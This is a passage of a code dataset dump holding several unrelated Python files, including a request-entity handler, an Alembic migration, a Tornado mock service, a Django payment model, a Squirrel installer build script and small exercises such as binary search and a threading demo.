entity.get_json_value_by_node_key(k)\n value = copy.copy((kwargs[k]))\n if value is None:\n handle_item_in_json(data_pattern, node,\n key, mode='pop_key')\n else:\n handle_item_in_json(data_pattern, node,\n key, values=value, mode='set')\n if args:\n raise 
Exception('*args is not supported now!')\n\n data = data_pattern\n\n return data\n\n def transform_data_pattern_to_json(temp_data_pattern):\n try:\n temp_data_pattern = json.loads(temp_data_pattern)\n except ValueError:\n return False\n return temp_data_pattern\n\n if isinstance(data_pattern, (str, unicode)):\n data_pattern = handle_str_fake(data_pattern)\n tmp_data_pattern = transform_data_pattern_to_json(\n data_pattern)\n if tmp_data_pattern:\n data_pattern = tmp_data_pattern\n data = handle_dict_data_pattern()\n else:\n data = handle_str_data_patten()\n elif isinstance(data_pattern, dict):\n data_pattern = handle_str_fake(json.dumps(data_pattern))\n data_pattern = json.loads(data_pattern)\n data = handle_dict_data_pattern()\n\n entity._data = data\n else:\n raise ValueError('_current_data_pattern is not properly set')\n\n return func(entity, *args, **kwargs)\n\n return wrapper\n\n\nclass EntityMetaClass(type):\n def __new__(cls, name, bases, attrs):\n attrs['utility'] = Utility()\n return super(EntityMetaClass, cls).__new__(cls, name, bases, attrs)\n\n def __call__(cls, *args, **kwargs):\n cls._service_helper = kwargs.has_key('service_helper') and \\\n kwargs['service_helper'] or ServiceHelperSingleton()\n\n [kwargs.pop(key) for key in ('service_helper',) if kwargs.has_key(key)]\n return super(EntityMetaClass, cls).__call__(*args, **kwargs)\n\n\nclass BasicTroopServiceEntityHandler(object):\n current_data_pattern = ''\n _special_node_attributes = []\n _special_key_attributes = []\n\n __metaclass__ = EntityMetaClass\n\n def __init__(self, url_string=None, data='', has_data_pattern=True,\n files=None, method_type='get',\n request_content_type='form', domain_name=None, cookies=None,\n token=None, stream=False, request_headers=None):\n self._url_string = url_string\n self._data = data\n self._has_data_pattern = has_data_pattern\n self._current_data_pattern = None\n self._request_content_type = request_content_type\n self._domain_name = domain_name\n self._method_type = method_type\n self._files = files\n self._default_url_pattern = url_string\n self._default_data = data\n self._default_request_content_type = request_content_type\n self._default_method_type = method_type\n self._json_content = None\n self._response = None\n self.cookies = cookies\n self.token = token\n self.stream = False\n self._request_headers = request_headers\n # 将类变量赋给实例变量\n self.service_helper = self._service_helper\n\n @property\n def json_content(self):\n return self._json_content\n\n @property\n def response_content(self):\n if not self._response:\n self._get_json_content()\n\n return self._response\n\n @property\n def current_data_pattern(self):\n return self._current_data_pattern\n\n def _refresh_default_args(self, **kwargs):\n for key, value in kwargs.iteritems():\n setattr(self, key, value)\n\n def _get_json_content(self):\n if self._method_type == 'post':\n self._response = self.service_helper.call_service_with_post(\n self._url_string, self._data,\n content_type=self._request_content_type,\n domain_name=self._domain_name, cookies=self.cookies,\n token=self.token, request_headers=self._request_headers)\n elif self._method_type == 'get':\n self._response = self.service_helper.call_service_with_get(\n self._url_string, self._data,\n domain_name=self._domain_name, cookies=self.cookies,\n token=self.token, stream=self.stream, request_headers=self._request_headers)\n elif self._method_type == 'put':\n self._response = self.service_helper.call_service_with_put(\n self._url_string, self._data,\n 
content_type=self._request_content_type,\n domain_name=self._domain_name, cookies=self.cookies,\n token=self.token, request_headers=self._request_headers)\n elif self._method_type == 'multipart_post':\n self._response = self.service_helper.call_service_with_multipart_post(\n self._url_string, self._data,\n self._files, domain_name=self._domain_name,\n cookies=self.cookies, token=self.token, request_headers=self._request_headers)\n elif self._method_type == 'delete':\n self._response = self.service_helper.call_service_with_delete(\n self._url_string, self._data,\n domain_name=self._domain_name, cookies=self.cookies,\n token=self.token, request_headers=self._request_headers)\n\n try:\n self._json_content = self._response.json()\n except ValueError:\n pass\n\n self.verify()\n\n self.cookies = self._response.cookies\n\n def _reload(self):\n self._url_string, self._data, self._method_type = \\\n self._default_url_pattern, self._default_data, self._default_method_type\n\n self._get_json_content()\n\n def _set_data_pattern(self, *args, **kwargs):\n raise NotImplementedError(\n \"Please override '_set_data_pattern' to set _current_data_pattern for request data\")\n\n def __getattr__(self, attribute):\n \"\"\"\n The method can help to get the entity attribute value in json object.\n And no declaration is needed in the entity.\n There are some requirements have to meet for the attribute name:\n i. the name should be combined with 'node name'+'_'+'key name' of the attribute in json object;\n ii. if 'node name' includes '_', the attribute name has to be added in special_node_attributes.\n iii. if 'key name' includes '_', the attribute name has to be added in special_key_attributes.\n :param attribute: the attribute name\n :return: the value which is corresponding to the given attribute name in json object.\n \"\"\"\n if not (self._response or self._json_content):\n self._get_json_content()\n\n values = []\n node, key = self.get_json_value_by_node_key(attribute)\n handle_item_in_json(self._json_content, node, key, values)\n\n if len(values) == 1:\n values = values.pop()\n\n return values\n\n def update_partial_query_data(self, partial_query_data):\n self._data = self._default_data + partial_query_data\n self._get_json_content()\n\n return self\n\n def verify(self):\n url_string = self._url_string % (\n self._domain_name or Global.SESSION['current_domain_name'])\n if str(self.result) in (\"error\", \"failed\") or str(self.ajaxResult) in (\n \"error\", \"failed\"):\n error_message = self.apiReturn_ValidationError or self.apiReturn_ErrorMessage or self.errors \\\n or self.ErrorMessage or self.ajaxErrors\n if isinstance(error_message, list) and len(error_message) == 1:\n error_message = error_message.pop()\n content_apiReturn = hasattr(self,\n 'content_apiReturn') and self.content_apiReturn or {}\n raise BorrowerResponseException(url_string, error_message,\n self.result, content_apiReturn)\n\n if str(self.result) == \"NG\":\n raise LenderResponseException(url_string, self.message, self.result)\n elif self.code and self.code not in (200, '103', '101'):\n raise LenderResponseException(url_string,\n self.errors or self.message,\n self.result)\n elif self.returnCode and self.returnCode not in ('000000',):\n raise Exception('service on error! 
path: %s, error_code: %s'\n % (str(self._url_string), self.returnCode))\n\n @set_request_data_from_args\n def send_request(self, *args, **kwargs):\n self._get_json_content()\n\n def get(self):\n self._get_json_content()\n return self\n\n def get_json_value_by_node_key(self, attribute):\n if attribute in self._special_node_attributes:\n node, key = attribute, None\n elif attribute in self._special_key_attributes:\n raw_list = attribute.split('_')\n node, key = raw_list[0], '_' + raw_list[1]\n else:\n raw_list = attribute.split('_')\n if len(raw_list) == 1:\n node, key = attribute, None\n elif len(raw_list) == 2:\n node, key = raw_list[0], raw_list[1]\n else:\n raise Exception(\n '''The attribute, named: %s, don't suitable for getting in this way.''' % attribute)\n return node, key\n","sub_path":"common/basic_troop_service_entity_handler.py","file_name":"basic_troop_service_entity_handler.py","file_ext":"py","file_size_in_byte":15401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"447550548","text":"import redis\n\nujjwal = \"True\"\n\nred_conf={\n'host': 'localhost',\n'port':'6379',\n'db':0\n}\n\n\nMail_classifier_api = \"http://<servername>:10101/classifier/v1/classify\"\nCz_sentiment_api = \"http://server IP:port/sentiment/v1/analyzer\"\n\nr_queue = \"cz_assist_que\" \n#write_quue=\n\"\"\"\nclass conn(self,host,port,db):\n def __init__():\n host = self.host\n port = self.port\n db = self.db\n initialize_con()\n def initialize_con(self):\n conn = redis.Redis(host=host,port=port,db=db,encoding=utf8,retry_on_timeout=True)\n return conn\n\n def re_initialize_con(self):\n\"\"\"\n","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"196888476","text":"\"\"\"empty message\n\nRevision ID: 4bfa35538a26\nRevises: 5e85166e9a6e\nCreate Date: 2020-10-15 17:33:37.523202\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '4bfa35538a26'\ndown_revision = '5e85166e9a6e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('phone', table_name='user')\n op.drop_column('user', 'role')\n op.drop_column('user', 'phone')\n op.drop_column('user', 'last_name')\n op.drop_column('user', 'gender')\n op.drop_column('user', 'name')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('user', sa.Column('name', mysql.VARCHAR(length=120), nullable=False))\n op.add_column('user', sa.Column('gender', mysql.INTEGER(), autoincrement=False, nullable=False))\n op.add_column('user', sa.Column('last_name', mysql.VARCHAR(length=120), nullable=False))\n op.add_column('user', sa.Column('phone', mysql.INTEGER(), autoincrement=False, nullable=True))\n op.add_column('user', sa.Column('role', mysql.INTEGER(), autoincrement=False, nullable=False))\n op.create_index('phone', 'user', ['phone'], unique=True)\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/4bfa35538a26_.py","file_name":"4bfa35538a26_.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"115815405","text":"import collections\nimport re\nimport urlparse\n\nfrom tornado.web import Application, HTTPError, RequestHandler\n\n\nclass MockService(object):\n\n def __init__(self, ioloop, port):\n self.ioloop = ioloop\n self.port = port\n self.host = \"localhost:{0}\".format(port)\n self.protocol = \"http\"\n self.base_url = \"http://\" + self.host\n self.routes = {}\n self._listening = False\n\n def url(self, path):\n return urlparse.urljoin(self.base_url, path)\n\n def listen(self):\n # this is a bit annoying for the end user, but it's better than\n # \"magically\" starting the service, potentially before the user\n # has finished populating routes (or alternatively never starting)\n\n if not self.routes.items():\n # making a 'catchall', since without routes Tornado infinitely\n # redirects. this is only really useful for mocking without\n # testing responses (which is sketchy anyway...)\n handler = self.add_method(\"GET\", \"/(.*)\", _unimplemented)\n handler.add_method(\"POST\", _unimplemented)\n handler.add_method(\"PUT\", _unimplemented)\n handler.add_method(\"OPTIONS\", _unimplemented)\n handler.add_method(\"INFO\", _unimplemented)\n\n application = Application(self.routes.items())\n application.listen(self.port, io_loop=self.ioloop)\n self._listening = True\n\n def add_method(self, method, route, method_handler):\n # this only works with text (not regex) routes, but it's a helper\n # anyway so deal with it. 
:)\n handler = self.routes.setdefault(route, build_handler(route))\n handler.add_method(method, method_handler)\n return handler\n\n def assert_requested(self, method, path, headers=None):\n headers = headers or {}\n for handler in self.routes.values():\n if handler.route.match(path):\n try:\n handler.assert_requested(method, path, headers)\n except AssertionError:\n continue\n return\n raise AssertionError(\"No request matched: {} {}\".format(method, path))\n\n\nclass MockServiceMethods():\n\n def get(self, *args, **kwargs):\n return self._handle_method(\"GET\", args, kwargs)\n\n def put(self, *args, **kwargs):\n return self._handle_method(\"PUT\", args, kwargs)\n\n def post(self, *args, **kwargs):\n return self._handle_method(\"POST\", args, kwargs)\n\n def options(self, *args, **kwargs):\n return self._handle_method(\"OPTIONS\", args, kwargs)\n\n def info(self, *args, **kwargs):\n return self._handle_method(\"INFO\", args, kwargs)\n\n def _handle_method(self, method, args, kwargs):\n request = _Request(method, self.request.path, self.request.headers)\n self.requests.append(request)\n if method not in self.method_handlers:\n raise HTTPError(405, \"Method '{}' has no handler.\".format(method))\n return self.method_handlers[method](self, *args, **kwargs)\n\n @classmethod\n def add_method(cls, method, handler):\n cls.method_handlers[method.upper()] = handler\n\n @classmethod\n def assert_requested(cls, method, path, headers):\n for request in cls.requests:\n if not request.method == method:\n continue\n if not request.path == path:\n continue\n if not compare_dicts(\n headers, request.headers, case_insensitive=True):\n continue\n\n if request.method == method and request.path == path:\n return\n raise AssertionError(\"No request matched: {}\".format(method))\n\n\ndef build_handler(handler_route):\n\n if type(handler_route) in (str, unicode):\n handler_route = re.compile(handler_route)\n\n class Handler(MockServiceMethods, RequestHandler):\n route = handler_route\n requests = []\n method_handlers = {}\n\n return Handler\n\n\n_Request = collections.namedtuple(\"Request\", [\"method\", \"path\", \"headers\"])\n\n\ndef _unimplemented(handler, route):\n handler.set_status(501)\n handler.finish(\"UNIMPLEMENTED RESPONSE\")\n\n\ndef compare_dicts(expected, actual, case_insensitive=False):\n if case_insensitive:\n expected = [(k.lower(), v) for k, v in expected.items()]\n actual = [(k.lower(), v) for k, v in actual.items()]\n return set(expected).issubset(actual)\n","sub_path":"tornadomock/mock_service.py","file_name":"mock_service.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"422404652","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.db.models import signals\nfrom django.dispatch import receiver\nfrom django.conf import settings\nfrom jsonfield import JSONField\n\nfrom .payment_method import PaymentMethod\nfrom .order import Order\nfrom .address import AbstractAddress\n\n__all__ = ['BillingAddress', 'Payment']\n\n\nclass BillingAddress(AbstractAddress):\n class Meta:\n verbose_name = _('billing address')\n verbose_name_plural = _('billing addresses')\n\n payment = models.OneToOneField('Payment', on_delete=models.CASCADE,\n related_name='billing_address',\n verbose_name=_('payment'))\n\n\nclass Payment(models.Model):\n class Meta:\n verbose_name = _('payment')\n verbose_name_plural = _('payments')\n\n created_dt = 
models.DateTimeField(_('created datetime'), auto_now_add=True)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, blank=True,\n related_name='payments',\n on_delete=models.SET_NULL, verbose_name=_('user'))\n # \"order\" being null means the payment is of a recharge, but not an order\n order = models.ForeignKey(Order, on_delete=models.CASCADE,\n related_name='payments', verbose_name=_('order'),\n blank=True, null=True)\n amount = models.FloatField(_('Payment|amount'))\n\n TYPE_STANDARD = 'standard'\n TYPE_RECHARGE = 'recharge'\n TYPES = (\n (TYPE_STANDARD, _('PaymentType|standard')),\n (TYPE_RECHARGE, _('PaymentType|recharge')),\n )\n\n type = models.CharField(_('type'), max_length=20,\n choices=TYPES, default=TYPE_STANDARD)\n\n recharged = models.BooleanField(_('Payment|recharged'), default=False)\n\n use_balance = models.BooleanField(_('Payment|use balance'))\n # amount that need to be paid from balance\n amount_from_balance = models.FloatField(_('Payment|amount from balance'),\n default=0.0)\n # amount that actually have been paid from balance\n paid_amount_from_balance = models.FloatField(\n _('Payment|paid amount from balance'), default=0.0)\n\n use_point = models.BooleanField(_('Payment|use point'))\n # amount that need to be paid from point\n amount_from_point = models.FloatField(_('Payment|amount from point'),\n default=0.0)\n # point that actually have been paid\n paid_point = models.IntegerField(_('Payment|paid point'), default=0)\n\n METHODS = (\n (PaymentMethod.PAYPAL, _('PayPal')),\n (PaymentMethod.CREDIT_CARD, _('credit card'))\n )\n\n method = models.CharField(_('Payment|method'), null=True, blank=True,\n max_length=20, choices=METHODS)\n vendor_payment_id = models.CharField(_('Payment|vendor payment ID'),\n null=True, blank=True, max_length=100)\n extra_info = JSONField(_('extra information'), default={}, blank=True)\n\n STATUS_PENDING = 'pending'\n STATUS_CLOSED = 'closed'\n STATUS_FAILED = 'failed'\n STATUS_SUCCEEDED = 'succeeded'\n\n STATUSES = (\n (STATUS_PENDING, _('PaymentStatus|pending')),\n (STATUS_CLOSED, _('PaymentStatus|closed')),\n (STATUS_FAILED, _('PaymentStatus|failed')),\n (STATUS_SUCCEEDED, _('PaymentStatus|succeeded')),\n )\n\n status = models.CharField(_('status'), max_length=20, choices=STATUSES,\n default=STATUS_PENDING)\n\n @staticmethod\n def status_changed(old_obj, new_obj):\n if new_obj.type == Payment.TYPE_STANDARD \\\n and new_obj.status in (Payment.STATUS_CLOSED,\n Payment.STATUS_FAILED):\n # payment closed or failed, refund paid balance and point\n new_obj.user.info.increase_point(new_obj.paid_point)\n new_obj.user.info.increase_balance(\n new_obj.paid_amount_from_balance)\n\n # clean payment object, in case of duplicated refund\n new_obj.paid_point = 0\n new_obj.paid_amount_from_balance = 0.0\n\n if new_obj.type == Payment.TYPE_RECHARGE \\\n and new_obj.status == Payment.STATUS_SUCCEEDED \\\n and not new_obj.recharged:\n # payment succeeded, increase the balance\n new_obj.user.info.increase_balance(new_obj.amount)\n new_obj.recharged = True\n\n def __str__(self):\n return _('Payment #%(pk)s') % {'pk': self.pk}\n\n\n@receiver(signals.pre_save, sender=Payment)\ndef payment_pre_save(instance, **kwargs):\n old_instance = None\n if instance.pk:\n old_instance = Payment.objects.get(pk=instance.pk)\n\n if old_instance and old_instance.status != instance.status:\n instance.status_changed(old_instance, instance)\n\n\n@receiver(signals.post_save, sender=Payment)\ndef payment_post_save(instance, **kwargs):\n # put this code in post_save is 
because that\n # the order should notify user and staffs after becoming \"paid\",\n # and that notification needs the payment object related to the order,\n # which means the payment with status \"succeeded\" must be save first\n if instance.type == Payment.TYPE_STANDARD \\\n and instance.status == Payment.STATUS_SUCCEEDED \\\n and instance.order.status == Order.STATUS_UNPAID:\n # payment succeeded, mark the order as paid\n instance.order.status = Order.STATUS_PAID\n instance.order.paid_amount = instance.amount\n instance.order.save()\n","sub_path":"milove/shop/models/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"538986665","text":"import os\nimport sys\nimport shutil\nimport tempfile\nimport subprocess\nimport http.client\nimport argparse\nimport traceback\nfrom urllib.parse import urlparse\n\nconfig = {\n 'name': \"Else\",\n 'nuspec_path': \"..\\else.nuspec\",\n 'base_path': \"..\\\\Build\\\\\",\n 'version_path': \"..\\\\version.txt\",\n 'release_dir': \"Releases\",\n 'releases_url': 'http://else-app.s3-eu-west-1.amazonaws.com/Releases/',\n 'package_dir': '..\\\\packages'\n}\n\n# determine path to squirrel tools (syncreleases.exe, squirrel.exe, etc):\nfor fname in os.listdir(config['package_dir']):\n if \"squirrel.windows\" in fname:\n config['squirrel_tools_path'] = os.path.join(\n config['package_dir'],\n fname,\n \"tools\"\n )\n\nif 'squirrel_tools_path' not in config:\n raise Exception(\n \"couldn't find squirrel.windows from the Else solution (this should be installed by nuget\"\n )\n# determine path to nuget.exe\nfor fname in os.listdir(config['package_dir']):\n if \"NuGet.CommandLine\" in fname:\n config['nuget_tools_path'] = os.path.join(\n config['package_dir'],\n fname,\n \"tools\"\n )\nif 'nuget_tools_path' not in config:\n raise Exception(\n \"couldn't find NuGet.CommandLine from the Else solution (this should be installed by nuget\"\n )\n\n\ndef get_setup_exe_name():\n \"\"\" determine the final setup.exe name (e.g. 
else.setup.exe) \"\"\"\n return \"{}.setup.exe\".format(config['name'])\n\n\ndef build_project():\n \"\"\" execute a shell script to build the solution \"\"\"\n print(\"Building solution via msbuild.bat..\")\n result = subprocess.call('build_solution.bat')\n if result:\n raise Exception(\"Failed to build solution\")\n print(\"Successfully built solution\")\n\n\ndef get_project_version():\n \"\"\" Load the project version from config['version_path'] \"\"\"\n f = open(config['version_path'], 'r')\n version = f.read()\n return version\n\n\ndef push_artifacts():\n \"\"\" push artifacts to appveyor \"\"\"\n for fname in os.listdir(config['release_dir']):\n # we want to push these files\n # Else.setup.exe\n # Else-0.0.17-full.nupkg\n # Else-0.0.17-delta.nupkg\n # RELEASES\n if get_project_version() in fname or fname == 'RELEASES' or fname == get_setup_exe_name():\n cmd = [\n 'c:\\\\program files\\\\appveyor\\\\buildagent\\\\appveyor.exe',\n 'PushArtifact',\n os.path.join(config['release_dir'],\n fname)\n ]\n subprocess.call(cmd)\n print(\" \".join(cmd))\n\n\ndef sync_releases():\n \"\"\" pull RELEASES from s3 \"\"\"\n print(\"syncing releases from \" + config['releases_url'])\n releases_uri = config['releases_url'] + \"RELEASES\"\n\n # check if there are any releases currently\n p = urlparse(releases_uri)\n conn = http.client.HTTPConnection(p.netloc)\n conn.request('HEAD', p.path)\n response = conn.getresponse()\n if response.status != 200:\n print(\"RELEASES does not exist, there are no releases to sync\")\n else:\n syncreleases_exe = config['squirrel_tools_path'] + \"\\\\syncreleases.exe\"\n cmd = [\n syncreleases_exe,\n \"-u\",\n config['releases_url'],\n \"-r\",\n config['release_dir']\n ]\n # syncreleases.exe calls Console.Error incorrectly\n # (https://github.com/Squirrel/Squirrel.Windows/blob/master/src/SyncReleases/Program.cs#L72)\n # so we redirect stderr to STDOUT, to ensure appveyor won't fail\n result = subprocess.call(cmd, stderr=subprocess.STDOUT)\n if result:\n raise Exception(\"Failed to sync releases\")\n\n\ndef build_nupkg(tempdir):\n \"\"\" generate a new nuspec (with changed version), and build a .nupkg using nuget.exe \"\"\"\n # check we have the required files\n if not os.path.isfile(config['nuspec_path']):\n print(\"Error: nuspec file not found (expected: {})\".format(config['nuspec_path']))\n return\n if not os.path.isfile(config['version_path']):\n print(\"Error: version file not found (expected: {})\".format(config['version_path']))\n return\n\n # get project version from config file\n config['version'] = get_project_version()\n\n # prepare nuspec\n f = open(config['nuspec_path'], \"r\")\n nuspec_contents = f.read()\n nuspec_contents = nuspec_contents.replace(\"{{version}}\", config['version'])\n\n # make temp build directory and copy nuspec into it\n target_nuspec_path = os.path.join(tempdir, os.path.basename(config['nuspec_path']))\n with open(target_nuspec_path, \"w\") as f:\n f.write(nuspec_contents)\n\n # build nupkg\n print(\"building nupkg..\")\n nuget_exe = config['nuget_tools_path'] + \"\\\\nuget.exe\"\n print(nuget_exe)\n cmd = [\n nuget_exe,\n \"pack\",\n \"-BasePath\",\n config['base_path'],\n \"-OutputDirectory\",\n tempdir,\n target_nuspec_path\n ]\n print(\" \".join(cmd))\n result = subprocess.call(cmd)\n if result:\n raise Exception(\"Failed to create nupkg\")\n\n\ndef build_installer(tempdir):\n \"\"\" releasify \"\"\"\n print(\"building installer..\")\n nupkg_path = os.path.join(tempdir, \"{}.{}.nupkg\".format(config['name'], config['version']))\n 
squirrel_exe = config['squirrel_tools_path'] + \"\\\\squirrel.exe\"\n cmd = [squirrel_exe, \"--releasify\", nupkg_path, \"--releaseDir\", config['release_dir']]\n result = subprocess.call(cmd)\n if result:\n raise Exception(\"Failed to releasify\")\n\n # rename setup.exe\n source_path = os.path.join(config['release_dir'], \"Setup.exe\")\n dest_path = os.path.join(config['release_dir'], get_setup_exe_name())\n print(\"Renaming {} to {}\".format(os.path.basename(source_path), os.path.basename(dest_path)))\n if os.path.exists(dest_path):\n os.unlink(dest_path)\n os.rename(source_path, dest_path)\n\n\ndef appveyor_build():\n \"\"\" build an installer and push as artifacts to appveyor \"\"\"\n tempdir = tempfile.mkdtemp()\n try:\n build_project()\n build_nupkg(tempdir)\n sync_releases()\n build_installer(tempdir)\n push_artifacts()\n except Exception as e:\n traceback.print_exc()\n finally:\n shutil.rmtree(tempdir)\n\n\ndef local_build():\n \"\"\" build a local installer \"\"\"\n tempdir = tempfile.mkdtemp()\n try:\n build_project()\n build_nupkg(tempdir)\n build_installer(tempdir)\n except Exception as e:\n traceback.print_exc()\n finally:\n shutil.rmtree(tempdir)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--appveyor\",\n help=\"Automated build with appveyor\",\n action=\"store_true\"\n )\n parser.add_argument(\n \"--local\",\n help=\"Build a local installer\",\n action=\"store_true\"\n )\n\n args = parser.parse_args()\n if args.appveyor:\n appveyor_build()\n elif args.local:\n local_build()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tools/build_installer.py","file_name":"build_installer.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"539942038","text":"from turtle import *\n\n\ndef platki():\n up()\n fillcolor(\"orangered\")\n begin_fill()\n circle(120)\n left(180)\n circle(120)\n right(90)\n circle(120)\n right(180)\n circle(120)\n end_fill()\n down()\n\n\ndef srodek(ilosc):\n up()\n forward(60)\n down()\n left(90)\n fillcolor(\"yellow\")\n begin_fill()\n circle(60)\n end_fill()\n left(90)\n up()\n forward(60)\n down()\n for i in range(ilosc):\n up()\n forward(60)\n down()\n forward(45)\n right(90)\n fillcolor(\"black\")\n begin_fill()\n circle(15)\n end_fill()\n right(90)\n forward(45)\n up()\n forward(60)\n down()\n right(180)\n right(360/ilosc)\n\n\ndef kwiatek(ilosc):\n platki()\n srodek(ilosc)\n\n\nkwiatek(5)","sub_path":"kwiatek.py","file_name":"kwiatek.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"202930185","text":"'''\r\nCreated on Dec 23, 2018\r\n\r\n@author: K3NN!\r\n'''\r\n'''Binary Search Algorithm using recursion'''\r\n\r\ndata = [307, 530, 346, 396, 468, 502, 282, 513, 486, 447, 540, 371,\r\n 210, 52, 477, 94, 226, 547, 43, 294, 70, 159, 508, 424, 412,\r\n 415, 55, 43, 387, 119, 371, 52, 317, 322, 96, 236, 151, 82, 147,\r\n 424, 548, 225, 134, 544, 495, 498, 80, 210, 219, 130]\r\ndata = sorted(data)\r\n\r\n\r\ndef binarySearch(data, target, low, high):\r\n if low > high:\r\n return False\r\n else:\r\n mid = low + (high - low) // 2\r\n\r\n if target == data[mid]:\r\n return True\r\n elif target < data[mid]:\r\n return binarySearch(data, target, low, mid - 1)\r\n else:\r\n return binarySearch(data, target, mid + 1, high)\r\n\r\n\r\n'''\r\nNon Recursive implementation of binary search'\r\n'''\r\n\r\n\r\ndef 
binarySearchNR(data, target):\r\n    low = 0\r\n    high = len(data) - 1  # get the number of items in data\r\n    found = False\r\n    while low <= high and not found:\r\n        mid = (low + high) // 2\r\n\r\n        if data[mid] == target:\r\n            found = True\r\n        else:\r\n            if data[mid] < target:\r\n                low = mid + 1\r\n            elif data[mid] > target:\r\n                high = mid - 1\r\n\r\n    return found\r\n\r\n\r\nif __name__ == '__main__':\r\n    n = len(data) - 1\r\n\r\n    print(binarySearch(data, 67, 0, n))\r\n    print(binarySearch(data, 371, 0, n))\r\n    print(binarySearchNR(data, 67))\r\n    print(binarySearchNR(data, 371))\r\n","sub_path":"DataStr/Recursion/binarySearch.py","file_name":"binarySearch.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"164339148","text":"#!/usr/bin/env python\n\nfrom bs4 import BeautifulSoup, SoupStrainer\nfrom re import compile, sub\nfrom collections import defaultdict\nfrom sys import argv\nimport shelve\nfrom pprint import pprint\n\n# Load pre-existing dict if possible.\nshelf_dict = shelve.open('my_shelf')\n\n# Only parse relevant HTML.\nonly_blocks = SoupStrainer('div', class_ = 'messageBlock')\n\n# lxml is more performant than built-in parser.\nsoup = BeautifulSoup(open(argv[1]), 'lxml', parse_only = only_blocks)\n\n# Get all divs that belong to the messageBlock class.\nmessage_blocks = soup.find_all('div', class_ = 'messageBlock')\n\n# If didn't load dict from shelf.\nif not shelf_dict: SHELF_EXISTED = False\nelse: SHELF_EXISTED = True\n\n# If key not in dict, don't throw KeyError and initialize with an empty list value.\nmaster_dict = defaultdict(list)\n\nfor block in message_blocks:\n    # Ignore system messages.\n    if not block['timestamp']: continue\n    # Unix-style timestamp.\n    timestamp = int(block['timestamp'])\n    # Get all the titles from the other* divs, including otherCont*.\n    title = block.find('div', class_ = compile('other'))['title']\n    # Get and remove time from title (e.g., title=\"Xi, Cyrus [9:42:54 AM]\").\n    time_pattern = compile(r'\\[.+\\]')\n    time = time_pattern.search(title).group()[1:-1]\n    # The name is what's left.\n    name = time_pattern.sub('', title)[:-1]\n    # Get the text from all message* (including messageCont*) divs.\n    message = block.find('div', class_ = compile('message')).get_text()[:-1]\n    message = message.encode('utf-8')\n    # Store both time and timestamp, because timestamps are unique and can order.\n    master_val_tup = (message, time, timestamp)\n    master_dict[name].append(master_val_tup)\n\nmaster_dict = dict(master_dict)\n\n# If had pre-existing dict, merge the two dicts.\nif SHELF_EXISTED:\n    keys = set(shelf_dict['my_dict']).union(master_dict)\n    no = []\n    # Generator expression.\n    # Make use of d.get(k, default) functionality.\n    master_dict = dict((k, shelf_dict['my_dict'].get(k, no) + master_dict.get(k, no)) for k in keys)\n    \n# Pretty print.\npprint(master_dict)\n\n# Update shelf.\nshelf_dict['my_dict'] = master_dict\nshelf_dict.close()\n","sub_path":"parse_transcript.py","file_name":"parse_transcript.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"284938544","text":"import time\r\nfrom threading import Thread\r\nimport threading\r\n\r\ndef somework(x):\r\n    print(threading.current_thread().name)\r\n    print(\"started\", x)\r\n    time.sleep(3)\r\n    print(\"done\", x)\r\n    \r\n    \r\n#for i in range(5):\r\n#    somework(i) #sync\r\nsomework(100)\r\n\r\nfor i in range(5):\r\n    t = 
Thread(target=somework, name='Thread-' + str(i), args=(i,))\r\n    t.start() #async\r\n    \r\n    \r\n","sub_path":"progs/thread1.py","file_name":"thread1.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"44187131","text":"\n'''\nhttps://www.hackerrank.com/challenges/simple-array-sum\n \nSimple Array Sum\n \nGiven an array of $N$ integers, can you find the sum of its elements?Input FormatThe first line contains an integer, $N$, denoting the size of the array. \nThe second line contains $N$ space-separated integers representing the array's elements. Output FormatPrint the sum of the array's elements as a single integer. Sample Input6\n1 2 3 4 10 11\nSample Output31\nExplanationWe print the sum of the array's elements, which is: $1 + 2 + 3 + 4 + 10 + 11 = 31$.\n''' and None\n#!/bin/python\n\nimport sys\n\n\nn = int(raw_input().strip())\narr = map(int,raw_input().strip().split(' '))\n\nprint sum(arr)\n","sub_path":"algorithms/warmup/simple-array-sum.py","file_name":"simple-array-sum.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
